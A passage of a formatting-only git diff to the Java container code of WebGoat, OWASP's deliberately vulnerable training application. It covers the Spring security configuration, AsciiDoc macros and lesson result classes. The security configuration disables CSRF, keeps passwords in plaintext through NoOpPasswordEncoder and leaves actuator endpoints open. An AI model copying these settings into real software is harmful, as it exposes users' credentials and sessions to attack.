- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
  * @version $Id: $Id
  * @since December 12, 2015
  */
-
 package org.owasp.webgoat.container;
 
 import lombok.AllArgsConstructor;
-import org.owasp.webgoat.container.i18n.Language;
 import org.owasp.webgoat.container.users.UserService;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.context.annotation.Bean;
@@ -44,59 +43,66 @@ import org.springframework.security.config.annotation.web.configuration.WebSecur
 import org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer;
 import org.springframework.security.core.userdetails.UserDetailsService;
 import org.springframework.security.crypto.password.NoOpPasswordEncoder;
-import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 
-/**
- * Security configuration for WebGoat.
- */
+/** Security configuration for WebGoat. */
 @Configuration
 @AllArgsConstructor
 @EnableWebSecurity
 public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
 
-    private final UserService userDetailsService;
+  private final UserService userDetailsService;
 
-    @Override
-    protected void configure(HttpSecurity http) throws Exception {
-        ExpressionUrlAuthorizationConfigurer<HttpSecurity>.ExpressionInterceptUrlRegistry security = http
-                .authorizeRequests()
-                .antMatchers("/css/**", "/images/**", "/js/**", "fonts/**", "/plugins/**", "/registration", "/register.mvc", "/actuator/**").permitAll()
-                .anyRequest().authenticated();
-        security.and()
-                .formLogin()
-                .loginPage("/login")
-                .defaultSuccessUrl("/welcome.mvc", true)
-                .usernameParameter("username")
-                .passwordParameter("password")
-                .permitAll();
-        security.and()
-                .logout().deleteCookies("JSESSIONID").invalidateHttpSession(true);
-        security.and().csrf().disable();
+  @Override
+  protected void configure(HttpSecurity http) throws Exception {
+    ExpressionUrlAuthorizationConfigurer<HttpSecurity>.ExpressionInterceptUrlRegistry security =
+        http.authorizeRequests()
+            .antMatchers(
+                "/css/**",
+                "/images/**",
+                "/js/**",
+                "fonts/**",
+                "/plugins/**",
+                "/registration",
+                "/register.mvc",
+                "/actuator/**")
+            .permitAll()
+            .anyRequest()
+            .authenticated();
+    security
+        .and()
+        .formLogin()
+        .loginPage("/login")
+        .defaultSuccessUrl("/welcome.mvc", true)
+        .usernameParameter("username")
+        .passwordParameter("password")
+        .permitAll();
+    security.and().logout().deleteCookies("JSESSIONID").invalidateHttpSession(true);
+    security.and().csrf().disable();
 
-        http.headers().cacheControl().disable();
-        http.exceptionHandling().authenticationEntryPoint(new AjaxAuthenticationEntryPoint("/login"));
-    }
+    http.headers().cacheControl().disable();
+    http.exceptionHandling().authenticationEntryPoint(new AjaxAuthenticationEntryPoint("/login"));
+  }
 
-    @Autowired
-    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
-        auth.userDetailsService(userDetailsService);
-    }
+  @Autowired
+  public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
+    auth.userDetailsService(userDetailsService);
+  }
 
-    @Bean
-    @Override
-    public UserDetailsService userDetailsServiceBean() throws Exception {
-        return userDetailsService;
-    }
+  @Bean
+  @Override
+  public UserDetailsService userDetailsServiceBean() throws Exception {
+    return userDetailsService;
+  }
 
-    @Override
-    @Bean
-    protected AuthenticationManager authenticationManager() throws Exception {
-        return super.authenticationManager();
-    }
+  @Override
+  @Bean
+  protected AuthenticationManager authenticationManager() throws Exception {
+    return super.authenticationManager();
+  }
 
-    @SuppressWarnings("deprecation")
-    @Bean
-    public NoOpPasswordEncoder passwordEncoder() {
-        return (NoOpPasswordEncoder) NoOpPasswordEncoder.getInstance();
-    }
+  @SuppressWarnings("deprecation")
+  @Bean
+  public NoOpPasswordEncoder passwordEncoder() {
+    return (NoOpPasswordEncoder) NoOpPasswordEncoder.getInstance();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java b/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java
index b3e26c10a..6c48ce1fa 100644
--- a/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java
+++ b/src/main/java/org/owasp/webgoat/container/WebWolfRedirect.java
@@ -10,12 +10,12 @@ import org.springframework.web.servlet.ModelAndView;
 @RequiredArgsConstructor
 public class WebWolfRedirect {
 
-    private final ApplicationContext applicationContext;
+  private final ApplicationContext applicationContext;
 
-    @GetMapping("/WebWolf")
-    public ModelAndView openWebWolf() {
-        var url = applicationContext.getEnvironment().getProperty("webwolf.url");
+  @GetMapping("/WebWolf")
+  public ModelAndView openWebWolf() {
+    var url = applicationContext.getEnvironment().getProperty("webwolf.url");
 
-        return new ModelAndView("redirect:" + url + "/home");
-    }
+    return new ModelAndView("redirect:" + url + "/home");
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java b/src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
index 16175c3c7..7abaf10c9 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/EnvironmentExposure.java
@@ -7,19 +7,20 @@ import org.springframework.core.env.Environment;
 import org.springframework.stereotype.Component;
 
 /**
- * Make environment available in the asciidoc code (which you cannot inject because it is handled by the framework)
+ * Make environment available in the asciidoc code (which you cannot inject because it is handled by
+ * the framework)
  */
 @Component
 public class EnvironmentExposure implements ApplicationContextAware {
 
-    private static ApplicationContext context;
+  private static ApplicationContext context;
 
-    public static Environment getEnv() {
-        return context.getEnvironment();
-    }
+  public static Environment getEnv() {
+    return context.getEnvironment();
+  }
 
-    @Override
-    public void setApplicationContext(ApplicationContext applicationContext) throws BeansException {
-        context = applicationContext;
-    }
+  @Override
+  public void setApplicationContext(ApplicationContext applicationContext) throws BeansException {
+    context = applicationContext;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
index c40c30fe6..87a60a879 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/OperatingSystemMacro.java
@@ -1,25 +1,25 @@
 package org.owasp.webgoat.container.asciidoc;
 
+import java.util.Map;
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
 
-import java.util.Map;
-
 public class OperatingSystemMacro extends InlineMacroProcessor {
 
-    public OperatingSystemMacro(String macroName) {
-        super(macroName);
-    }
+  public OperatingSystemMacro(String macroName) {
+    super(macroName);
+  }
 
-    public OperatingSystemMacro(String macroName, Map<String, Object> config) {
-        super(macroName, config);
-    }
+  public OperatingSystemMacro(String macroName, Map<String, Object> config) {
+    super(macroName, config);
+  }
 
-    @Override
-    public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
-        var osName = System.getProperty("os.name");
+  @Override
+  public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
+    var osName = System.getProperty("os.name");
 
-        //see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
-        return createPhraseNode(contentNode, "quoted", osName);
-    }
+    // see
+    // https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
+    return createPhraseNode(contentNode, "quoted", osName);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
index ac4fe0535..7275ba9b1 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/UsernameMacro.java
@@ -1,31 +1,31 @@
 package org.owasp.webgoat.container.asciidoc;
 
+import java.util.Map;
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
 import org.owasp.webgoat.container.users.WebGoatUser;
 import org.springframework.security.core.context.SecurityContextHolder;
 
-import java.util.Map;
-
 public class UsernameMacro extends InlineMacroProcessor {
 
-    public UsernameMacro(String macroName) {
-        super(macroName);
+  public UsernameMacro(String macroName) {
+    super(macroName);
+  }
+
+  public UsernameMacro(String macroName, Map<String, Object> config) {
+    super(macroName, config);
+  }
+
+  @Override
+  public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
+    var auth = SecurityContextHolder.getContext().getAuthentication();
+    var username = "unknown";
+    if (auth.getPrincipal() instanceof WebGoatUser webGoatUser) {
+      username = webGoatUser.getUsername();
     }
 
-    public UsernameMacro(String macroName, Map<String, Object> config) {
-        super(macroName, config);
-    }
-
-    @Override
-    public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
-        var auth = SecurityContextHolder.getContext().getAuthentication();
-        var username = "unknown";
-        if (auth.getPrincipal() instanceof WebGoatUser webGoatUser) {
-            username = webGoatUser.getUsername();
-        }
-
-        //see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
-        return createPhraseNode(contentNode, "quoted", username);
-    }
+    // see
+    // https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
+    return createPhraseNode(contentNode, "quoted", username);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
index c7158378d..12c283f9a 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatTmpDirMacro.java
@@ -1,26 +1,25 @@
 package org.owasp.webgoat.container.asciidoc;
 
+import java.util.Map;
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
 
-import java.util.Map;
-
 public class WebGoatTmpDirMacro extends InlineMacroProcessor {
 
-    public WebGoatTmpDirMacro(String macroName) {
-        super(macroName);
-    }
+  public WebGoatTmpDirMacro(String macroName) {
+    super(macroName);
+  }
 
-    public WebGoatTmpDirMacro(String macroName, Map<String, Object> config) {
-        super(macroName, config);
-    }
+  public WebGoatTmpDirMacro(String macroName, Map<String, Object> config) {
+    super(macroName, config);
+  }
 
-    @Override
-	public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
-        var env = EnvironmentExposure.getEnv().getProperty("webgoat.server.directory");
+  @Override
+  public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
+    var env = EnvironmentExposure.getEnv().getProperty("webgoat.server.directory");
 
-        //see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
-        return createPhraseNode(contentNode, "quoted", env);
-
-    }
+    // see
+    // https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
+    return createPhraseNode(contentNode, "quoted", env);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
index 929136c45..09658e8b2 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebGoatVersionMacro.java
@@ -1,25 +1,25 @@
 package org.owasp.webgoat.container.asciidoc;
 
+import java.util.Map;
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
 
-import java.util.Map;
-
 public class WebGoatVersionMacro extends InlineMacroProcessor {
 
-    public WebGoatVersionMacro(String macroName) {
-        super(macroName);
-    }
+  public WebGoatVersionMacro(String macroName) {
+    super(macroName);
+  }
 
-    public WebGoatVersionMacro(String macroName, Map<String, Object> config) {
-        super(macroName, config);
-    }
+  public WebGoatVersionMacro(String macroName, Map<String, Object> config) {
+    super(macroName, config);
+  }
 
-    @Override
-	public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
-        var webgoatVersion = EnvironmentExposure.getEnv().getProperty("webgoat.build.version");
+  @Override
+  public Object process(ContentNode contentNode, String target, Map<String, Object> attributes) {
+    var webgoatVersion = EnvironmentExposure.getEnv().getProperty("webgoat.build.version");
 
-        //see https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
-        return createPhraseNode(contentNode, "quoted", webgoatVersion);
-    }
+    // see
+    // https://discuss.asciidoctor.org/How-to-create-inline-macro-producing-HTML-In-AsciidoctorJ-td8313.html for why quoted is used
+    return createPhraseNode(contentNode, "quoted", webgoatVersion);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
index 4a736c96f..9ab0fac86 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfMacro.java
@@ -1,73 +1,73 @@
 package org.owasp.webgoat.container.asciidoc;
 
+import java.util.HashMap;
+import java.util.Map;
+import javax.servlet.http.HttpServletRequest;
 import org.asciidoctor.ast.ContentNode;
 import org.asciidoctor.extension.InlineMacroProcessor;
 import org.springframework.web.context.request.RequestContextHolder;
 import org.springframework.web.context.request.ServletRequestAttributes;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.HashMap;
-import java.util.Map;
-
 /**
  * Usage in asciidoc:
- * <p>
- * webWolfLink:here[] will display a href with here as text
+ *
+ * <p>webWolfLink:here[] will display a href with here as text
  */
 public class WebWolfMacro extends InlineMacroProcessor {
 
-    public WebWolfMacro(String macroName) {
-        super(macroName);
+  public WebWolfMacro(String macroName) {
+    super(macroName);
+  }
+
+  public WebWolfMacro(String macroName, Map<String, Object> config) {
+    super(macroName, config);
+  }
+
+  @Override
+  public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) {
+    var env = EnvironmentExposure.getEnv();
+    var hostname = determineHost(env.getProperty("webwolf.port"));
+    var target = (String) attributes.getOrDefault("target", "home");
+    var href = hostname + "/" + target;
+
+    // are we using noLink in webWolfLink:landing[noLink]? Then display link with full href
+    if (displayCompleteLinkNoFormatting(attributes)) {
+      linkText = href;
     }
 
-    public WebWolfMacro(String macroName, Map<String, Object> config) {
-        super(macroName, config);
+    var options = new HashMap<String, Object>();
+    options.put("type", ":link");
+    options.put("target", href);
+    attributes.put("window", "_blank");
+    return createPhraseNode(contentNode, "anchor", linkText, attributes, options).convert();
+  }
+
+  private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
+    return attributes.values().stream().anyMatch(a -> a.equals("noLink"));
+  }
+
+  /**
+   * Determine the host from the hostname and ports that were used. The purpose is to make it
+   * possible to use the application behind a reverse proxy. For instance in the docker
+   * compose/stack version with webgoat webwolf and nginx proxy. You do not have to use the
+   * indicated hostname, but if you do, you should define two hosts aliases 127.0.0.1
+   * www.webgoat.local www.webwolf.local
+   */
+  private String determineHost(String port) {
+    HttpServletRequest request =
+        ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
+    String host = request.getHeader("Host");
+    int semicolonIndex = host.indexOf(":");
+    if (semicolonIndex == -1 || host.endsWith(":80")) {
+      host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
+    } else {
+      host = host.substring(0, semicolonIndex);
+      host = host.concat(":").concat(port);
     }
+    return "http://" + host + (includeWebWolfContext() ? "/WebWolf" : "");
+  }
 
-    @Override
-    public Object process(ContentNode contentNode, String linkText, Map<String, Object> attributes) {
-        var env = EnvironmentExposure.getEnv();
-        var hostname = determineHost(env.getProperty("webwolf.port"));
-        var target = (String) attributes.getOrDefault("target", "home");
-        var href = hostname + "/" + target;
-
-        //are we using noLink in webWolfLink:landing[noLink]? Then display link with full href
-        if (displayCompleteLinkNoFormatting(attributes)) {
-            linkText = href;
-        }
-
-        var options = new HashMap<String, Object>();
-        options.put("type", ":link");
-        options.put("target", href);
-        attributes.put("window", "_blank");
-        return createPhraseNode(contentNode, "anchor", linkText, attributes, options).convert();
-    }
-
-    private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
-        return attributes.values().stream().anyMatch(a -> a.equals("noLink"));
-    }
-
-    /**
-     * Determine the host from the hostname and ports that were used.
-     * The purpose is to make it possible to use the application behind a reverse proxy. For instance in the docker
-     * compose/stack version with webgoat webwolf and nginx proxy.
-     * You do not have to use the indicated hostname, but if you do, you should define two hosts aliases
-     * 127.0.0.1 www.webgoat.local www.webwolf.local
-     */
-    private String determineHost(String port) {
-        HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
-        String host = request.getHeader("Host");
-        int semicolonIndex = host.indexOf(":");
-        if (semicolonIndex == -1 || host.endsWith(":80")) {
-            host = host.replace(":80", "").replace("www.webgoat.local", "www.webwolf.local");
-        } else {
-            host = host.substring(0, semicolonIndex);
-            host = host.concat(":").concat(port);
-        }
-        return "http://" + host + (includeWebWolfContext() ? "/WebWolf" : "");
-    }
-
-    protected boolean includeWebWolfContext() {
-        return true;
-    }
+  protected boolean includeWebWolfContext() {
+    return true;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
index 8c5d5450c..58b12e547 100644
--- a/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
+++ b/src/main/java/org/owasp/webgoat/container/asciidoc/WebWolfRootMacro.java
@@ -4,22 +4,22 @@ import java.util.Map;
 
 /**
  * Usage in asciidoc:
- * <p>
- * webWolfLink:here[] will display a href with here as text
- * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing
+ *
+ * <p>webWolfLink:here[] will display a href with here as text webWolfLink:landing[noLink] will
+ * display the complete url, for example: http://WW_HOST:WW_PORT/landing
  */
 public class WebWolfRootMacro extends WebWolfMacro {
 
-    public WebWolfRootMacro(String macroName) {
-        super(macroName);
-    }
+  public WebWolfRootMacro(String macroName) {
+    super(macroName);
+  }
 
-    public WebWolfRootMacro(String macroName, Map<String, Object> config) {
-        super(macroName, config);
-    }
+  public WebWolfRootMacro(String macroName, Map<String, Object> config) {
+    super(macroName, config);
+  }
 
-    @Override
-    protected boolean includeWebWolfContext() {
-        return false;
-    }
+  @Override
+  protected boolean includeWebWolfContext() {
+    return false;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
index 09e4d7cfc..c48fb2f23 100644
--- a/src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentEndpoint.java
@@ -35,57 +35,58 @@ import org.springframework.beans.factory.annotation.Autowired;
 
 public abstract class AssignmentEndpoint implements Initializeable {
 
-    @Autowired
-    private WebSession webSession;
-    @Autowired
-    private UserSessionData userSessionData;
-    @Getter
-    @Autowired
-    private PluginMessages messages;
+  @Autowired private WebSession webSession;
+  @Autowired private UserSessionData userSessionData;
+  @Getter @Autowired private PluginMessages messages;
 
-    protected WebSession getWebSession() {
-        return webSession;
-    }
+  protected WebSession getWebSession() {
+    return webSession;
+  }
 
-    protected UserSessionData getUserSessionData() {
-        return userSessionData;
-    }
+  protected UserSessionData getUserSessionData() {
+    return userSessionData;
+  }
 
-    /**
-     * Convenience method for create a successful result:
-     * <p>
-     * - Assignment is set to solved
-     * - Feedback message is set to 'assignment.solved'
-     * <p>
-     * Of course you can overwrite these values in a specific lesson
-     *
-     * @return a builder for creating a result from a lesson
-     * @param assignment
-     */
-    protected AttackResult.AttackResultBuilder success(AssignmentEndpoint assignment) {
-        return AttackResult.builder(messages).lessonCompleted(true).attemptWasMade().feedback("assignment.solved").assignment(assignment);
-    }
+  /**
+   * Convenience method for create a successful result:
+   *
+   * <p>- Assignment is set to solved - Feedback message is set to 'assignment.solved'
+   *
+   * <p>Of course you can overwrite these values in a specific lesson
+   *
+   * @return a builder for creating a result from a lesson
+   * @param assignment
+   */
+  protected AttackResult.AttackResultBuilder success(AssignmentEndpoint assignment) {
+    return AttackResult.builder(messages)
+        .lessonCompleted(true)
+        .attemptWasMade()
+        .feedback("assignment.solved")
+        .assignment(assignment);
+  }
 
-    /**
-     * Convenience method for create a failed result:
-     * <p>
-     * - Assignment is set to not solved
-     * - Feedback message is set to 'assignment.not.solved'
-     * <p>
-     * Of course you can overwrite these values in a specific lesson
-     *
-     * @return a builder for creating a result from a lesson
-     * @param assignment
-     */
-    protected AttackResult.AttackResultBuilder failed(AssignmentEndpoint assignment) {
-        return AttackResult.builder(messages).lessonCompleted(false).attemptWasMade().feedback("assignment.not.solved").assignment(assignment);
-    }
+  /**
+   * Convenience method for create a failed result:
+   *
+   * <p>- Assignment is set to not solved - Feedback message is set to 'assignment.not.solved'
+   *
+   * <p>Of course you can overwrite these values in a specific lesson
+   *
+   * @return a builder for creating a result from a lesson
+   * @param assignment
+   */
+  protected AttackResult.AttackResultBuilder failed(AssignmentEndpoint assignment) {
+    return AttackResult.builder(messages)
+        .lessonCompleted(false)
+        .attemptWasMade()
+        .feedback("assignment.not.solved")
+        .assignment(assignment);
+  }
 
-    protected AttackResult.AttackResultBuilder informationMessage(AssignmentEndpoint assignment) {
-        return AttackResult.builder(messages).lessonCompleted(false).assignment(assignment);
-    }
+  protected AttackResult.AttackResultBuilder informationMessage(AssignmentEndpoint assignment) {
+    return AttackResult.builder(messages).lessonCompleted(false).assignment(assignment);
+  }
 
-    @Override
-    public void initialize(WebGoatUser user) {
-    }
+  @Override
+  public void initialize(WebGoatUser user) {}
 }
diff --git a/src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
index b6111b5c7..bfea97438 100644
--- a/src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentHints.java
@@ -5,12 +5,10 @@ import java.lang.annotation.Retention;
 import java.lang.annotation.RetentionPolicy;
 import java.lang.annotation.Target;
 
-/**
- * Created by nbaars on 1/14/17.
- */
+/** Created by nbaars on 1/14/17. */
 @Target(ElementType.TYPE)
 @Retention(RetentionPolicy.RUNTIME)
 public @interface AssignmentHints {
 
-    String[] value() default {};
+  String[] value() default {};
 }
diff --git a/src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
index 7e57d593b..0c1993393 100644
--- a/src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AssignmentPath.java
@@ -1,22 +1,19 @@
 package org.owasp.webgoat.container.assignments;
 
-import org.springframework.web.bind.annotation.RequestMethod;
-
 import java.lang.annotation.ElementType;
 import java.lang.annotation.Retention;
 import java.lang.annotation.RetentionPolicy;
 import java.lang.annotation.Target;
+import org.springframework.web.bind.annotation.RequestMethod;
 
-/**
- * Created by nbaars on 1/14/17.
- */
+/** Created by nbaars on 1/14/17. */
 @Target(ElementType.TYPE)
 @Retention(RetentionPolicy.RUNTIME)
 public @interface AssignmentPath {
 
-    String[] path() default {};
+  String[] path() default {};
 
-    RequestMethod[] method() default {};
+  RequestMethod[] method() default {};
 
-    String value() default "";
+  String value() default "";
 }
diff --git a/src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java b/src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
index b2d18b7a6..3cf353c21 100644
--- a/src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/AttackResult.java
@@ -25,100 +25,104 @@
 
 package org.owasp.webgoat.container.assignments;
 
+import static org.apache.commons.text.StringEscapeUtils.escapeJson;
+
 import lombok.Getter;
 import org.owasp.webgoat.container.i18n.PluginMessages;
 
-import static org.apache.commons.text.StringEscapeUtils.escapeJson;
-
 public class AttackResult {
 
+  public static class AttackResultBuilder {
 
-    public static class AttackResultBuilder {
-
-        private boolean lessonCompleted;
-        private PluginMessages messages;
-        private Object[] feedbackArgs;
-        private String feedbackResourceBundleKey;
-        private String output;
-        private Object[] outputArgs;
-        private AssignmentEndpoint assignment;
-        private boolean attemptWasMade = false;
-
-        public AttackResultBuilder(PluginMessages messages) {
-            this.messages = messages;
-        }
-
-        public AttackResultBuilder lessonCompleted(boolean lessonCompleted) {
-            this.lessonCompleted = lessonCompleted;
-            this.feedbackResourceBundleKey = "lesson.completed";
-            return this;
-        }
-
-        public AttackResultBuilder lessonCompleted(boolean lessonCompleted, String resourceBundleKey) {
-            this.lessonCompleted = lessonCompleted;
-            this.feedbackResourceBundleKey = resourceBundleKey;
-            return this;
-        }
-
-        public AttackResultBuilder feedbackArgs(Object... args) {
-            this.feedbackArgs = args;
-            return this;
-        }
-
-        public AttackResultBuilder feedback(String resourceBundleKey) {
-            this.feedbackResourceBundleKey = resourceBundleKey;
-            return this;
-        }
-
-        public AttackResultBuilder output(String output) {
-            this.output = output;
-            return this;
-        }
-
-        public AttackResultBuilder outputArgs(Object... args) {
-            this.outputArgs = args;
-            return this;
-        }
-
-        public AttackResultBuilder attemptWasMade() {
-            this.attemptWasMade = true;
-            return this;
-        }
-
-        public AttackResult build() {
-            return new AttackResult(lessonCompleted, messages.getMessage(feedbackResourceBundleKey, feedbackArgs), messages.getMessage(output, output, outputArgs), assignment.getClass().getSimpleName(), attemptWasMade);
-        }
-
-        public AttackResultBuilder assignment(AssignmentEndpoint assignment) {
-            this.assignment = assignment;
-            return this;
-        }
-    }
-
-    @Getter
     private boolean lessonCompleted;
-    @Getter
-    private String feedback;
-    @Getter
+    private PluginMessages messages;
+    private Object[] feedbackArgs;
+    private String feedbackResourceBundleKey;
     private String output;
-    @Getter
-    private final String assignment;
-    @Getter
-    private boolean attemptWasMade;
+    private Object[] outputArgs;
+    private AssignmentEndpoint assignment;
+    private boolean attemptWasMade = false;
 
-    public AttackResult(boolean lessonCompleted, String feedback, String output, String assignment, boolean attemptWasMade) {
-        this.lessonCompleted = lessonCompleted;
-        this.feedback = escapeJson(feedback);
-        this.output = escapeJson(output);
-        this.assignment = assignment;
-        this.attemptWasMade = attemptWasMade;
+    public AttackResultBuilder(PluginMessages messages) {
+      this.messages = messages;
     }
 
-    public static AttackResultBuilder builder(PluginMessages messages) {
-        return new AttackResultBuilder(messages);
+    public AttackResultBuilder lessonCompleted(boolean lessonCompleted) {
+      this.lessonCompleted = lessonCompleted;
+      this.feedbackResourceBundleKey = "lesson.completed";
+      return this;
     }
 
-    public boolean assignmentSolved() {
-        return lessonCompleted;
+    public AttackResultBuilder lessonCompleted(boolean lessonCompleted, String resourceBundleKey) {
+      this.lessonCompleted = lessonCompleted;
+      this.feedbackResourceBundleKey = resourceBundleKey;
+      return this;
     }
+
+    public AttackResultBuilder feedbackArgs(Object... args) {
+      this.feedbackArgs = args;
+      return this;
+    }
+
+    public AttackResultBuilder feedback(String resourceBundleKey) {
+      this.feedbackResourceBundleKey = resourceBundleKey;
+      return this;
+    }
+
+    public AttackResultBuilder output(String output) {
+      this.output = output;
+      return this;
+    }
+
+    public AttackResultBuilder outputArgs(Object... args) {
+      this.outputArgs = args;
+      return this;
+    }
+
+    public AttackResultBuilder attemptWasMade() {
+      this.attemptWasMade = true;
+      return this;
+    }
+
+    public AttackResult build() {
+      return new AttackResult(
+          lessonCompleted,
+          messages.getMessage(feedbackResourceBundleKey, feedbackArgs),
+          messages.getMessage(output, output, outputArgs),
+          assignment.getClass().getSimpleName(),
+          attemptWasMade);
+    }
+
+    public AttackResultBuilder assignment(AssignmentEndpoint assignment) {
+      this.assignment = assignment;
+      return this;
+    }
+  }
+
+  @Getter private boolean lessonCompleted;
+  @Getter private String feedback;
+  @Getter private String output;
+  @Getter private final String assignment;
+  @Getter private boolean attemptWasMade;
+
+  public AttackResult(
+      boolean lessonCompleted,
+      String feedback,
+      String output,
+      String assignment,
+      boolean attemptWasMade) {
+    this.lessonCompleted = lessonCompleted;
+    this.feedback = escapeJson(feedback);
+    this.output = escapeJson(output);
+    this.assignment = assignment;
+    this.attemptWasMade = attemptWasMade;
+  }
+
+  public static AttackResultBuilder builder(PluginMessages messages) {
+    return new AttackResultBuilder(messages);
+  }
+
+  public boolean assignmentSolved() {
+    return lessonCompleted;
+  }
